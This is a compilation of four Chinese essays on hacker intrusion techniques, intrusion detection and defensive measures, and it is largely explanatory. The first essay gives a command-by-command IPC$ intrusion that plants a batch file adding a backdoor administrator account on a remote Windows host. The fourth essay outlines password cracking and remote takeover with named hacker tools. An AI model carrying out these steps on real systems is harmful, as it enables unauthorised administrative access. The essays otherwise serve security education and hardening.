黑客的入侵与防范(精选4篇)
黑客的入侵与防范 篇1
1 黑客攻击的动机
随着时间的变化, 黑客攻击的动机不再像以前那样简单了:只是对编程感兴趣, 或是为了发现系统漏洞。现在, 黑客攻击的动机越来越多样化, 主要有以下几种:⑴贪心。因为贪心而偷窃或者敲诈, 有了这种动机, 才引发许多金融案件。⑵恶作剧。计算机程序员搞的一些恶作剧, 是黑客的老传统。⑶名声。有些人为显露其计算机经验与才智, 以便证明自己的能力, 获得名气。⑷报复/宿怨。解雇、受批评或者被降级的雇员, 或者其他认为自己受到不公正待遇的人, 为了报复而进行攻击。⑸无知/好奇。有些人拿到了一些攻击工具, 因为好奇而使用, 以至于破坏了信息还不知道。⑹仇恨。国家和民族原因。⑺间谍。政治和军事谍报工作。⑻商业。商业竞争, 商业间谍。
2 网络攻击的步骤
黑客技术是网络安全技术的一部分, 主要是看用这些技术做什么, 用来破坏其他人的系统就是黑客技术, 用于安全维护就是网络安全技术。学习这些技术就是要对网络安全有更深的理解, 从更深的层次提高网络安全。
进行网络攻击并不是件简单的事情, 它是一项复杂及步骤性很强的工作。一般的攻击都分为3个阶段, 即攻击的准备阶段、攻击的实施阶段、攻击的善后阶段。
攻击的准备阶段
⑴在攻击的准备阶段重点做3件事情:确定攻击目的、收集目标信息以及准备攻击工具。 (1) 确定攻击目的:首先确定攻击希望达到的效果, 这样才能做下一步工作。 (2) 收集目标信息:在获取了目标主机及其所在网络的类型后, 还需进一步获取有关信息, 如目标主机的IP地址、操作系统的类型和版本、系统管理人员的邮件地址等, 根据这些信息进行分析, 可以得到被攻击系统中可能存在的漏洞。 (3) 准备攻击工具:收集或编写适当的工具, 并在操作系统分析的基础上, 对工具进行评估, 判断有哪些漏洞和区域没有覆盖到。
⑵以一个常见的网络入侵为例子
IPC$入侵方法
1) IPC$连接的建立与断开
(1) 建立IPC$连接。假设192.168.1.104主机的用户名为abc, 密码为123456, 则输入以下命令。
net use192.168.1.104IPC$"123456"/user:"abc"
若要建立空连接, 则输入以下命令。
net use192.168.1.104IPC$""/user:""
(2) 建立网络驱动器, 输入以下命令。
net use z:192.168.1.104C$
若要删除网络驱动器, 输入以下命令。
net use z:/delete
(3) 断开IPC$连接。输入以下命令。
net use192.168.1.104IPC$/delete
2) 建立后门账号
(1) 编写批处理文件。在“记事本”中输入“net user sysback 123456/add”和“net localgroup administrators sysback/add”命令, 另存为hack.bat文件。 (2) 与目标主机建立IPC$连接。 (3) 复制文件到目标主机。输入“copy hack.bat192.168.1.104C$”命令, 把hack.bat文件复制到目标主机的C盘中。 (4) 通过计划任务使远程主机执行hack.bat文件, 输入“net time192.168.1.104”命令, 查看目标系统时间。 (5) 假设目标系统的时间为22:30, 则可输入“at192.168.1.10422:35 c:hack.bat”命令, 计划任务添加完毕后, 使用“net use*/delete”命令, 断开IPC$连接。 (6) 验证账号是否成功建立。等一段时间后, 估计远程主机已经执行了hack.bat文件。通过sysback账号建立IPC$连接。若连接成功, 说明sysback后门账号已经成功建立。
3 网络攻击的防范策略, 以IPC$入侵的防范为例:
IPC$在为管理员提供了方便的同时, 也留下了严重的安全隐患, 防范IPC$入侵的方法有以下3种。
(1) 删除默认共享。 (2) 禁止利用空连接进行用户名枚举攻击。在注册表中, 把HKEY_LOCAL_MACHINESYSTEMCurrent Control SetControlLsa中的restrictanonymous子键的值改为1。修改完毕后重新启动计算机, 这样便禁止了利用空连接进行用户名枚举攻击 (nbtstat–a IP) 。不过要说明的是, 这种方法并不能禁止建立空连接。 (3) 关闭Server服务。Server服务是IPC$和默认共享所依赖的服务, 如果关闭Server服务, IPC$和默认共享便不存在, 但同时服务器也丧失了其他一些服务, 因此该方法只适合个人计算机使用。 (4) 屏蔽139、445端口。没有这两个端口的支持, 是无法建立IPC$连接的, 因此屏蔽139、445端口同样可以阻止IPC$入侵。
4 网络入侵证据的收集与分析
从事网络安全工作的人都知道, 黑客在入侵之后都会想方设法抹去自己在受害系统上的活动记录, 目的是逃脱法律的制裁。而许多企业也不上报网络犯罪, 其原因在于害怕这样做会对业务运作或企业商誉造成负面影响, 他们担心这样做会让业务运作因此失序, 更重要的是收集犯罪证据有一定困难。因此, CIO (Chief Information Office, 首席信息官) 们应该在应急响应系统的建立中加入计算机犯罪证据的收集与分析环节。
计算机取证又称为数字取证或电子取证, 是指对计算机入侵、破坏、欺诈、攻击等犯罪行为利用计算机软硬件技术, 按照符合法律规范的方式进行证据获取、保存、分析和出示的过程。从技术上, 计算机取证是一个对受侵计算机系统进行扫描和破解, 以及对整个入侵事件进行重建的过程。
4.1 计算机取证包括物理证据获取和信息发现两个阶段
物理证据获取是指调查人员到计算机犯罪或入侵的现场, 寻找并扣留相关的计算机硬件;信息发现是指从原始数据 (包括文件, 日志等) 中寻找可以用来证明或者反驳的证据, 即电子证据。除了那些刚入门的“毛小子”之外, 计算机犯罪分子也会在作案前周密部署、作案后消除蛛丝马迹。他们更改、删除目标主机中的日志文件, 清理自己的工具软件, 或利用反取证工具来破坏侦察人员的取证。
4.2 物理取证是核心任务
在任何情况下, 调查者都应牢记以下5点: (1) 不要改变原始记录。 (2) 不要在作为证据的计算机上执行无关的操作。 (3) 不要给犯罪者销毁证据的机会。 (4) 详细记录所有的取证活动。 (5) 妥善保存得到的物证。
摘要:黑客是“Hacker”的音译, 源于动词Hack, 在美国麻省理工学院校园俚语中是“恶作剧”的意思, 尤其是那些技术高明的恶作剧, 确实, 早期的计算机黑客个个都是编程高手。因此, “黑客”是人们对那些编程高手、迷恋计算机代码的程序设计人员的称谓。真正的黑客有自己独特的文化和精神, 并不破坏其他人的系统, 他们崇拜技术, 对计算机系统的最大潜力进行智力上的自由探索。
关键词:Hacker,网络,防范
参考文献
[1]陈忠平.《网络安全》.清华大学出版社, 2011年.
[2] (美) 格里格瑞斯, 等, 著.《网络安全:现状与展望》.科学出版社, 2010年.
[3]王淑江.《超级网管员网络安全》.机械工业出版社, 2011年.
浅谈防范黑客入侵攻击的主要方法 篇2
黑客网络的攻击方式是多种多样的, 一般来讲, 总是利用“系统配置的缺陷”, “操作系统的安全漏洞”或“通信协议的安全漏洞”来进行的。到目前为止, 已经发现的攻击方式超过2000种, 这些攻击大概可以划分为以下六类:
1、拒绝服务攻击
一般情况下, 拒绝服务攻击是通过使被攻击对象 (通常是工作站或重要服务器) 的系统关键资源过载, 从而使被攻击对象停止部分或全部服务。目前已知的拒绝服务攻击就有几百种, 它是最基本的入侵手段, 也是最难对付的入侵攻击之一, 典型示例有SYN Flood攻击、Ping Flood攻击、Win Nuke攻击等。
2、非授权访问尝试
非授权访问尝试是攻击者对被保护文件进行读、写或执行的尝试, 也包括为获得被保护访问权限所做的尝试。
3、预探测攻击
在连续的非授权访问尝试过程中, 攻击者为了获得网络内部的信息及网络周围的信息, 通常使用这种攻击尝试, 典型示例包括SATAN扫描、端口扫描和IP半途扫描等。
4、可疑活动
可以活动是通常定义的“标准”网络通信范畴之外的活动, 也可以指网络上不希望有的活动, 如IP Unknown Protocol和Duplicate IP Address事件等。
5、协议解码
协议解码可用于以上任何一种非期望的方法中, 网络或安全管理员需要进行解码工作, 并获得相应的结果, 解码后的协议信息可能表明期望的活动, 如FIU User和Portmapper Proxy等解码方式。
6、系统代理攻击
这种攻击通常是针对单个主机发起的, 而并非整个网络, 通过Real Secure系统代理可以对它们进行监视。
二、防范黑客攻击的主要方法
了解了黑客的攻击方式, 除了硬件上要做好防范外, 还要自己懂得使用一些简单的网络病毒防范程序, 合理使用网络安全程序, 能在一定基础上降低黑客侵入系统的几率。通常的技术手段如下:
1、关闭“文件和打印共享”
随着办公业务的不断增加, 共享一些资料成为一种常用的办公手段, 许多办公室共用一台打印机的现象也非常普遍, 这种使用环境很容易让一些不安全的电脑病毒程序, 利用此功能, 在电脑之间不断传输与感染, 甚至一些黑客也利用此漏洞进行一些窃取密码与重要文件的活动, 为了杜绝此类现象的发生, 最有效的办法就是确保共享功能及时关闭, 具体操作办法就是用鼠标右击“网络邻居”, 选择“属性”, 然后单击“文件和打印共享”按钮, 将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。
2、关闭系统来宾账户
Guest帐户指计算机操作系统分配的来宾帐户, 用这个账户可以进入计算机系统, 但是访问会受到一些限制, 常用的浏览查找功能可以实现, 一些管理功能此账户是禁止操作的, 不过一些病毒也可以利用此账户, 登入计算机系统, 安放后门程序, 伺机窃取复制重要数据与密码, 禁用或彻底删除Guest帐户是最好的办法。
3、严禁创建空连接
在一般的情况下, 所有的计算机终端用户都可以进行空连接连到系统服务器, 从而进行账号密码的反复比对进行破解。所以对于网络服务器系统必须严禁建立空连接。一般可以通过修改系统注册表实现:
打开注册表“HKEY_LOCAL_MACHINESystemCurrentControlSetC o n t r o lL S A”, 将D W O R D值“RestrictAnonymous”的键值改为“1”即可。
4、将IP地址进行隐藏与伪装
黑客经常利用一些网络探测技术来查看我们的主机信息, 主要目的就是得到网络中主机的IP地址。隐藏IP地址的主要方法是使用代理服务器。代理服务器的原理是在客户机和远程服务器之间架设一个“中转站”, 当客户机向远程服务器提出服务要求后, 代理服务器首先截取用户的请求, 然后代理服务器将服务请求转交远程服务器, 从而实现客户机和远程服务器之间的联系。很显然, 使用代理服务器后, 其它用户只能探测到代理服务器的IP地址而不是用户的IP地址, 这就实现了隐藏用户IP地址的目的, 保障了用户上网安全。
5、无用的系统端口要进行屏蔽
一般情况, 网络黑客在需要系统漏洞时, 通常会网络中大量扫描开放的计算机端口, 如果安装了端口监视程序 (比如Netwatch) , 该监视程序则会有警告提示。如果遇到这种入侵, 可用工具软件关闭用不到的端口。
6、建立防护体系, 安装专业查杀防护软件
对于接入互联网的电脑, 在使用过程中, 必须进行系统安全漏洞的弥补, 确保系统无安全隐患, 同时安装防毒杀毒程序, 并时时更新病毒库, 每间隔一段时间就要对计算机系统进行全方面病毒查杀, 必要时也要增加硬件防火墙, 培养良好的网络使用习惯, 不去点击存在病毒风险的网站, 在网络中下载软件资料前, 要对相关的数据及时查杀, 确保安全后, 方可下载, 不冒然接受来历不明的电子邮件防止被木马感染, 通过一系列的安全防范系统的建立, 会在一定程度上防范黑客程序的危害, 但是对于重要数据与密码, 还是需要电脑操作者及时进行备份与更新, 确保数据被破坏后能够及时恢复。
结语
黑客入侵技术的分析和检测 篇3
关键词:黑客入侵,变异,入侵检测,数据恢复
0 引言
黑客是指对计算机信息系统进行非授权访问的人员,“非授权入侵”是黑客的基本特征。与早期黑客相比,现代黑客在入侵动机、入侵技术手段和方式等方面发生了明显的变异。
目前的黑客已经向有组织、趋利性、专业性和定向性的方向发展,以获取经济利益和窃取在线身份为主要目的。现代网络安全技术的发展,也迫使黑客改变入侵技术和方式,本文仅对黑客入侵技术和方式的变异进行分析,并在此基础上探讨防范的对策。
1 黑客入侵技术和方式的变异
1.1 各种恶意软件的融合
过去人们常常将黑客软件分为扫描类软件、远程监控软件、病毒和蠕虫、系统攻击、密码破解和监听类软件,这些软件具有单一的特征和功能。现在各种恶意软件技术的融合、功能的叠加,已经很难区别其种类了。
1.2 黑客程序的隐蔽性
过去黑客的入侵是寻找系统漏洞入侵系统,而现在黑客则是想办法隐蔽自己,躲避管理员。
黑客程序通过各种方法进行修改和伪装,以躲过杀毒防黑软件和各种检测。通过对黑客程序加壳、加密、加花指令以及变换入口点等,使木马能躲过杀毒软件。
1.3 黑客的入侵方式
黑客常见的入侵方式有以下几种:木马入侵、漏洞入侵、口令入侵等。
木马是设计藏在电脑中进行特定工作或依照黑客的操作来进行某些工作的程序。它是一个C/S结构的程序,运行在黑客电脑上的是Client端,运行在目标电脑上的是Server端。电脑中木马的原因有以下几种:(1)黑客入侵后植入。(2)利用系统或软件的漏洞侵入。(3)寄电子邮件后侵入,寄一封夹带木马程序的信件,只要收件者不注意网络安全运行它就可能成功入侵。(4)在网站上放一些伪装后的木马程序,让不知情的人下载运行后便可成功入侵木马程序。
系统总会存在一定的安全漏洞,这些漏洞有些是设计者疏忽造成的,有些是系统管理员错误配置产生的,在补丁开发出来之前,黑客利用专门的扫描工具就可以发现并利用这些漏洞进行攻击。除此之外,还有拒绝服务攻击、利用缓冲区溢出攻击、网络炸弹攻击、远程修改注册表、IP欺骗、WWW欺骗、ICQ/OICQ攻击等方式。
口令入侵是利用非法获得的合法用户的账号和口令进入到目标主机进行攻击和破坏活动。获取口令的常见方法有网络监听、获取账号后用软件破解用户口令、获取服务器上的用户口令文件以及利用系统漏洞等方式。
2 入侵检测
一个安全的系统至少应该满足用户系统的保密性、完整性及可用性要求。随着因特网大范围的开放以及金融网络领域的接入,越来越多的系统遭到入侵攻击的威胁。对付破坏系统企图的理想方法是建立一个完全安全的系统,这要求所有的用户识别认证自己,还要采用各种各样的加密技术和访问控制策略来保护数据。但从实际上,这是不可能实现的。一个比较实用的方法是,建立比较容易实现的安全系统,同时按照一定的安全策略建立相应的安全辅助系统,入侵检测就是这样一类系统。
系统存在被攻击的可能性,如果遭到攻击,只要尽可能地检测到,然后采取恰当的处理措施。入侵检测作为安全技术其作用在于:(1)识别入侵者;(2)识别入侵行为;(3)检测和监视已成功的安全突破;(4)为对抗入侵及时提供重要信息,阻止事件的发生和事态的扩大。
入侵检测主要分为两大类型:异常入侵检测和误用入侵检测。异常入侵检测是指能够根据异常行为和使用计算机资源情况检测出来的入侵,异常入侵检测试图用定量方式描述可接受的行为特征,以区分非正常的、潜在的入侵行为。Anderson提出了一个威胁模型,将威胁分为外部闯入、内部渗透和不当行为3种类型,并使用这种方法开发了一个安全监视系统,可检测用户的异常行为。误用入侵检测是指利用已知系统和应用软件的弱点来检测入侵,与异常入侵检测相反,误用入侵检测能直接检测不利的或不可接受的行为,而异常入侵检测是检查出与正常行为相违背的行为。
入侵检测技术模型最早由Dorothy Denning提出,如图1所示。目前入侵检测技术及其体系都是在此基础上的扩展和细化。
异常入侵检测的前提条件是将入侵活动作为异常活动的子集,然而入侵活动并不总是与异常活动相符合,这种活动存在4种可能性:(1)入侵而异常;(2)非入侵且异常;(3)非入侵且非异常;(4)入侵且异常。异常入侵要解决的问题就是构造异常活动集并从中发现入侵活动子集。异常检测是通过观察到的一组测量值偏离度来预测用户行的变化来作出决策判断的检测技术。
误用入侵检测是假设具有能够被精确地按某种方式编码的攻击,并可以通过捕获攻击及重新整理,确认入侵活动是基于同一弱点进行攻击的入侵方法的变种。误用入侵检测指的是通过按照预先定义好的入侵模式以及观察到入侵发生的情况进行模式匹配来检测。
通过入侵检测及时检测网络攻击迹象,查找黑客的信息和攻击情况利用移动代理技术,结合系统日志、嗅探器等工具跟踪黑客,研究攻击路线,发现真正的攻击源,根据历史记录和其它的相关信息制定“潜在黑客清单”,当“潜在黑客”上网后,系统及时警告并追踪黑客。
3 数据恢复
数据恢复是指当被检测的系统关键文件由于网络攻击、计算机病毒破坏等,其内容被改变以后,能够在短时间内恢复破坏前的内容。在数据恢复中源主机把需要保护的数据纳入实时监控,在其备份联盟中进行备份,一旦检测到关键数据文件遭受攻击或非法篡改,恢复模块将从备份点传送关键数据被非法改动的部分用以恢复关键数据。
准确和快速是数据恢复的基本要求,备份方式和恢复机制是实现数据恢复的关键。把每一个关键服务或关键文件及其备份副本组成一个恢复单元,每个恢复单元都有一个副本管理器进行控制管理。副本管理器通过故障检测检查各副本的存在性,接收协同控制中心的检测审计结果,用于故障的诊断恢复和状态更新。
4 小结
黑客入侵和反黑客入侵技术在对抗中不断发展,在应对黑客入侵时,研究和分析其变异的特点和原因。随着网络入侵技术的不断发展,入侵行为表现出不确定性、复杂性、多样性等特点。入侵检测有许多关键问题有待解决,如高效、准确的检测算法。数据恢复是网络安全的最后一道防线,使系统能恢复正常运行。
参考文献
[1]Miller,B.P.,Koski,D.,Lee,Cjin Pheow,et al.A re-examination of the reliability of UNIX utilities and services,Technical Report.Department of Computer Sciences.University of Wisconsin.1995.
[2]阮耀平,易江波,赵战生.计算机入侵检测模型与方法.计算机工程.1999.
[3]姚玉献.网络安全与入侵检测.计算机安全.2007.
[4]李伟华,姜兰.黑客入侵检测与安全事故恢复.西北工业大学学报.2005.
基于黑客入侵手段的安全系统分析 篇4
随着时代的发展,网络的普及,网络在人们的生活和工作中扮演了更为重要的角色,由于互联网的开放性,网络安全问题日益突出。机器内部资料泄露、网上银行密码泄露、机器被恶意破坏等现象经常出现,即使计算机装了杀毒软件、防火墙,但还是中毒,还是会被黑客入侵。要提高网络的安全防护性能和抗攻击能力,黑客入侵防范体系的研究[1]成为当务之急。本文将从攻的角度分析黑客入侵的常规思路,并在此基础上提出如何构建安全的系统。
2 常用黑客软件介绍
黑客所使用的软件,从入侵的角度来看主要从踩点工具、攻击工具、入侵工具、欺骗工具、提权工具、密码工具、木马和痕迹清除工具几个方面组成。每个方面的软件包罗万象,互联网上每天都会有很多的人通过各种各样的方式编写适合自己的、简单易用的工具来为自己服务或者谋取利益。以下对常用黑客工具进行简单说明。
踩点工具:踩点工具主要目的是进行目标机器信息的收集,往往是攻击的第一步。较典型的工具有XSCAN、Shadow Security Scanner、SCANIPC等。
攻击工具:攻击工具主要目的是将目标机器资源耗尽,导致目标机器不能正常提供应用业务,较典型的工具有DDOS2.0等。
入侵工具:入侵工具主要目的是通过踩点工具所收集的一些信息里的可利用漏洞信息进行入侵,较典型的工具有HDSI、流光等。
欺骗工具:欺骗工具主要目的是通过修改提交数据包中某些目标机器所需要的参数来达到欺骗的目的,从而得到目标机器的数据或者取得目标机器的某种权限。较典型的工具有:IECV、stealthPE等。
提权工具:提权工具主要是通过已经获取的一些弱的权限进一步提升为管理权限或者更高级别的权限。较典型的工具有:FINDPASS、3389提权等。
密码工具:密码工具主要是功能是将目标机器的密码收集起来或者将目标机器的密码破解出来,较典型的工具有:MD5CRACK、lcomsoft.Advanced.Passsword.Recovery.Studio.2006
木马:木马主要是写好的各种脚本和木马,通常用来控制目标机器或者收集目标机器的信息将其发送到指定的位置。较典型的木马有:海洋系列木马、灰鸽子等。
3 入侵思路分析
有了上述的入侵的软件介绍,大家应该对入侵各个方面有了一个方面的了解。那么,究竟黑客入侵有哪些常规思路,是否必须使用工具才能入侵,以下将进行详细分析。
所有的黑客在入侵之前,都得知道自己要入侵的目标是什么,或者是批量的目标,或者是单一的目标。如果是批量的目标,一般都是根据某一单一威胁[2]如:弱口令、漏洞等,统一编写一个扫描探测甚至与攻击相结合的软件,来进行批量入侵。如果是这样,那黑客入侵行为流程图中的很多个步骤都被黑客通过软件的形式集成在一起来进行了。故必不可少的一个步骤是知道目标以后的踩点工作。踩点收集到所需要的一些资料以后就可以直接进行DDOS攻击导致目标机器崩溃。或是对踩点收集到的资料进行相应的分析、判断目前收集的信息符合操作系统信息足够、服务信息足够、应用程序信息足够及数据库信息这四个方面中某一个或多个的入侵要求,事实上,只要有一个达到入侵要求,就可以通过它发动入侵了。当然这个判断很多时候是通过黑客多次入侵的经验积累得来的,又或者说是根据黑客手里所存在的一些入侵、攻击软件得来的。这一步的分析就决定了入侵的成功与否。当取得了入侵的有用信息以后,就会获取其访问权限,如果访问权限够大就可以直接种植木马或者恶意程序,转而攻击其他目标机器[3]。如果权限还达不到要求就要进行权限的提升,最终获取控制权限。获取到控制权限以后,黑客就可以进行想要做的一些工作了,如:清除/伪造痕迹、安装后门、sniffer嗅探、获取有用资源、恶意破坏资源和伪造信息欺骗了。当入侵到目标机器以后,通过嗅探局域网中的信息、获取目标机器资源或者伪造信息欺骗得到了其他目标机器的一些资料时,黑客就又可以进行下一次其他目标机器的入侵了。
4 黑客入侵案例分析及防范体系设计
以某个实例来分析黑客怎么进行入侵的,黑客入侵行为流程图中,哪些过程是必须的。以192.168.0.2这台目标机器为例看看。
如果黑客要入侵192.168.0.2,他们首先要进行资料的收集,可以手工做,但那样效率很低,效果不明显,一般采用不同效果的多种软件来做,扫描工具NESSUS是最有名气的工具之一,或者常用的XS-CAN,这里,将主要利用XSCAN来进行分析。
设备好XSCAN以后,对目标机器进行扫描,有如表1-表3的结果。
分析扫描结果,可以看出这台机器由于不是服务器,收集到了一些操作系统的相关信息,像操作系统类型、端口等,没有服务、应用和数据库的信息被收集到。想要入侵这台机器就只有靠操作系统的信息了。仔细分析信息,可以发现这台机器由于开了139、135端口,泄漏了不少的操作系统相关信息,比较有用的信息如下:
从上面扫描结果可以分析出系统的相关帐户,如果能够拿到帐户的密码的话,那黑客就可以入侵这台机器了,为了达到目标,可以使用小榕写的黑客软件流光来进行本地密码的爆破,通过破解,黑客很快就可以找到超级用户admin的用户密码。
有了这些信息以后,接下去要做的就是权限的提升,进而控制整台计算机。这一步可以通过许多的软件来做了,通常黑客会从开放3389远程桌面连接、开放TELNET、种植木马或安装RADMIN远程控制类软件服务端。
至此,这台机器就被入侵了,进而可以通过清除/伪造痕迹、安装后门、sniffer嗅探、获取有用资源、恶意破坏资源和伪造信息欺骗等,利用获取到的资料进行下一目标的入侵。
如果攻击目标是一台远程服务器,上面开放了IIS服务等面向公众提供WEB或者视频服务等的机器,在这种情况下入侵的方式可能会有一些变化,可以通过其他收集到的信息走其他的路线进行攻击,进入以后,会通过发表或者修改服务器常用页面来挂网页木马、恶意程序等。
有时候,通过服务器的一些漏洞,在不入侵服务器的情况下,就可以进行对其他访问服务器用户的攻击,例如跨站脚本攻击Cross Site Script Execution(通常简写为XSS)的时候,就是利用网页提供服务时,由于网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式[4]。网页挂马或者恶意连接等类似的攻击方式在目前看来对广大用户的影响是最大的,只要访问者访问服务器,访问者没有一定的安全意识或者访问者机器没有相关的安全防范,就很容易受到攻击,被黑客挂木马。
分析了黑客入侵的常规思路和过程,下面来分析如何防范黑客入侵。
要防范黑客的入侵,不能单靠某一个杀毒软件、防火墙,而要多方面结合,具体从下面几个方面作好工作:
1)深入了解自己机器,了解机器所存在的问题和漏洞威胁,将自己的威胁降到最低。
2)培养自己的安全意识,尽量不去打开不安全的链接和网站,像淫秽网站、不知名的网站等。
3)及时打好补丁和各应用程序的升级软件。
4)从入侵的各个点去掐断黑客的入侵,例如:让黑客收集不到所要的信息、获取不到访问权限、不能进行权限提升等。
5)看到机器有异常的时候,找专业人士分析具体情况,找出异常的根源来,彻底解决它。
6)有良好的操作习惯,例如:人走关机或锁屏、定时更换密码、将密码设置成较复杂等。
7)不轻意在网上泄漏自己的个人信息,尽量使用虚假信息注册不可靠的网站或论坛。
8)将自己的用户名密码在各大网站、游戏等各种应用程序中不要设置成相同,对自己敏感的信息,密码一定要不重复且复杂。
9)将自己机器上的重要资料及时作好非本机的备份,并将重要资料加密存放。
10)发现攻击或者入侵,如果可以,第一时间断开网络,如果不能断网,及时作好追踪和破坏的审查。尽量将范围缩小。
5 结束语
该文主要针对目前大多数用户上网过程中经常遇到机器重毒和机器被入侵的情况,通过介绍入侵过程中所使用的黑客工具,黑客入侵的常规思路,以及黑客入侵的典型实例,从黑客入侵的角度让用户了解受到黑客威胁的原因,从而解决了用户以往只知道需要装防火墙、杀毒软件来解决问题的错误思路。
当然,黑客入侵防范体系在实际应用中的具体实施,还需要对相关人员进行安全基础知识的培训,需要培养安全专业技术人才及完善的法律法规做后盾。
参考文献
[1]何德全.新的世纪召唤新的Internet安全范式[J].信息安全与通信保密,2001(12):10-15.
[2]刘宝旭,徐菁,许榕生.黑客入侵防护体系研究与设计[J].计算机工程与应用,2001(8).
[3]梁丽明.计算机网络黑客及其入侵检测系统探析[J].机电工程技术,2004(8).
【黑客的入侵与防范】推荐阅读:
防范黑客的攻击09-29
黑客防范08-30
黑客与信息安全07-09
黑客与网络安全10-12
黑客与网络安全06-30
黑客与画家读后感10-14
网络安全与黑客攻防09-21
网络入侵的研究与发展06-21
虚幻的真实--《黑客帝国》影评05-08
网络入侵的方法与检测论文10-08